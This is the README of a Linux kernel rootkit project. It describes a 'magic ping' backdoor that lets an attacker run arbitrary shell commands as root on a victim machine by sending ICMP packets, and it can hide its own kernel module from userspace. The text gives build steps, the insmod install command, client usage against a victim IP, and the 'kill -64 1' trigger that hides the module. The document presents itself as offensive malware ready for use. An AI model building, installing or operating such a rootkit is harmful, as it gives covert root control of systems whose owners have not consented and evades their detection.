linux-rootkit

linux-rootkit copied to clipboard

Magic ping - shell execution

Features:

• Romete shell command execution by ping.
• Hiding (or Showing) Kernel Module from Userspace.

Asciinema Demo

Compile

compile server(victim) kernel module:

cd server && make

Client(attacker):

cd client && make

Romete server (victim):

sudo insmod server.ko

Local attacker:

Need root privilege to send icmp packets for ping.

sudo ./client <victim ip address>

Then you can let remote victim execute whatever shell command you input as root privilege (some command may need full path).

Hide(Show) remote kernel module:

Send signal 64 to show or hide:

kill -64 1

Use lsmod to check.

Thanks && Reference：

• Hacking the Linux Kernel Network Stack
• Does tcpdump bypass iptables?
• linux-network-programming-ping.c
• Given a git commit hash, how to find out which kernel release contains it?
• Linux Rootkits Part 5: Hiding Kernel Modules from Userspace
• Hooking Linux Kernel Functions, Part 2: How to Hook Functions with Ftrace